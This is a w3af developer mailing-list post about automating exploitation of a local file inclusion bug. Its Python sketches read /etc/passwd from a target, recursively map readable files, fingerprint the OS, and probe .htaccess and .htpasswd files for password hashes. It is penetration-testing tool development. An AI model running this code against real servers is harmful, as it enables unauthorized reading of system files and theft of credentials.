Updated numbers,

On Sun, Dec 28, 2008 at 1:24 AM, Andres Riancho
<andres.rian...@gmail.com> wrote:
> List,
>
>    Last Friday at the office one of the guys found a vulnerability in
> a web application: the classic index.php?filename=/etc/passwd bug,
> which lets you read the content of any file given that you know its
> location and Apache has the permissions to read it.
>
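For those who haven't seen this kind of bug before, the raw primitive is
nothing more than a GET request with the target path in the vulnerable
parameter. A minimal stand-alone sketch in Python (the URL and the
parameter name are made up, this is not the plugin code):

    import urllib.parse
    import urllib.request

    # Hypothetical vulnerable endpoint, replace with the real one.
    BASE_URL = 'http://target.example/index.php?filename='

    def read_remote_file(path):
        """Return the HTTP response body for a local path on the target."""
        url = BASE_URL + urllib.parse.quote(path)
        with urllib.request.urlopen(url) as response:
            return response.read().decode('utf-8', errors='replace')

    # The classic proof of concept:
    print(read_remote_file('/etc/passwd'))
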
>    After that, I slightly modified the attack.localFileReader plugin
> from w3af so that it worked as expected, and during the last hour I've
> been playing with a nice idea that I wanted to share. The idea is
> pretty simple, but I haven't seen it implemented in any other
> software. First, a small introduction to attack.localFileReader:
> basically you only have one command, "cat", which lets you print the
> content of a file through a local file inclusion/read vulnerability.
> Using that, I wanted to obtain a list of files on the remote web
> server that may contain important information for me as a penetration
> tester... so I added the "list" command, which operates as follows
> (there is a rough sketch of the loop right after the list):
>
> - cat a non-existent file, and save the response
> - cat a lot of common files, and compare each response with the
> non-existent one; if they differ, the file exists
> - for all the files just found, parse them and try to find references
> to other files. For example, if I find that /etc/init.d/apache2
> exists and parse it, I obtain a list with /bin/sh,
> /usr/sbin/apache2ctl, /usr/sbin/htcacheclean, etc.
> - for every reference found in any of the previous files, run the
> process again.
>
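For anyone curious about the actual loop, here is a simplified sketch of
what I implemented. It is not the real plugin code: it assumes a
read_remote_file() primitive like the one above, a small seed word list,
and a naive comparison against the baseline response (in practice the
comparison probably needs to ignore the parts of the page that echo the
requested filename):

    import re

    # Absolute *nix paths referenced inside a file, e.g. /usr/sbin/apache2ctl
    PATH_RE = re.compile(r'/(?:[\w.-]+/)*[\w.-]+')

    # Seed list, heavily trimmed for the example.
    COMMON_FILES = ['/etc/passwd', '/etc/fstab', '/etc/init.d/apache2']

    def list_files(read_remote_file, max_depth=4):
        """Discover readable files by following path references recursively."""
        # cat a file that can't exist and keep the response as a baseline
        baseline = read_remote_file('/non-existent-w3af-check')

        known = set()
        to_check = set(COMMON_FILES)

        for depth in range(max_depth + 1):
            new_refs = set()
            for path in to_check:
                body = read_remote_file(path)
                # if the response differs from the baseline, the file exists
                if body == baseline:
                    continue
                known.add(path)
                # parse the content and queue every path-looking reference
                new_refs.update(PATH_RE.findall(body))
            print('Recursion level %d, %d unique files.' % (depth, len(known)))
            # repeat the whole process with the newly found references
            to_check = new_refs - known
            if not to_check:
                break
        return known
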
>    At first I thought that this would only give me a few files beyond
> the ones I already knew were there, and that I would hit a dead end
> after one or two levels of recursion. But I was mistaken, and I'm
> happy to say so =) Here are some results:
>
> Recursion level 0, 15 unique files.
> Recursion level 1, 37 unique files.
> Recursion level 2, 60 unique files.
> Recursion level 3, 1162 unique files.
> Recursion level 4, 2903 unique files.

Recursion level 5, 3483 unique files.
Recursion level 6, 4454 unique files.

>    I wanted to test it with a recursion level greater than 4, but it
> took too long. For those who are curious, see the attached file for a
> run of the attack plugin.
>
>    After finishing my implementation, I started to wonder... what
> else could be achieved (in an automated fashion, of course) using a
> local file read vulnerability? Here are some ideas that I still have
> to add to the plugin:
>
>    - OS identification: Easy one, because you could just "cat
> /etc/debian_version", and if it's there you know it's Debian, and the
> content of the file tells you which version the target is running
> (Ubuntu ships that file too, so some ambiguity may arise).
>
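Something along these lines is what I have in mind, just checking a
handful of well-known release files (the mapping below is only a starting
point, not what the plugin will ship with):

    # Release files that identify the distribution when they can be read.
    OS_FINGERPRINT_FILES = {
        '/etc/debian_version': 'Debian (or a derivative such as Ubuntu)',
        '/etc/lsb-release': 'Ubuntu / LSB-compliant distribution',
        '/etc/redhat-release': 'Red Hat / CentOS / Fedora',
        '/etc/SuSE-release': 'SUSE',
        '/etc/slackware-version': 'Slackware',
    }

    def identify_os(read_remote_file, baseline):
        """Guess the remote distribution from well-known release files."""
        for path, distro in OS_FINGERPRINT_FILES.items():
            body = read_remote_file(path)
            if body != baseline:
                # the file content usually carries the exact version string
                print('%s -> %s: %s' % (path, distro, body.strip()))
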
>    - .htaccess and .htpasswd files that may contain weak hashes: For
> every directory that the list command finds, we could request
> /directory/.htaccess and /directory/.htpasswd. Too many requests?
> Maybe request .ht* only for directories whose path contains "www" or
> "htdocs", or something like that?
>
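Roughly what I have in mind, again just a sketch (the "www"/"htdocs"
filter is the open question, and the function names are made up):

    import posixpath

    def probe_htfiles(read_remote_file, baseline, found_files):
        """Try .htaccess / .htpasswd in directories we already know about."""
        directories = {posixpath.dirname(f) for f in found_files}
        for directory in sorted(directories):
            # optional filter to keep the request count down: only look
            # inside paths that smell like a web root
            if 'www' not in directory and 'htdocs' not in directory:
                continue
            for name in ('.htaccess', '.htpasswd'):
                path = posixpath.join(directory, name)
                body = read_remote_file(path)
                if body != baseline:
                    print('Found %s:\n%s' % (path, body))
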
>    Can you think about other interesting techniques that can be
> applied to this vulnerability in order to gain more information about
> the target server? Thanks for your input!
>
> Cheers,
> --
> Andres Riancho
> http://w3af.sourceforge.net/
> Web Application Attack and Audit Framework
>



-- 
Andres Riancho
http://w3af.sourceforge.net/
Web Application Attack and Audit Framework

_______________________________________________
W3af-develop mailing list
W3af-develop@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/w3af-develop
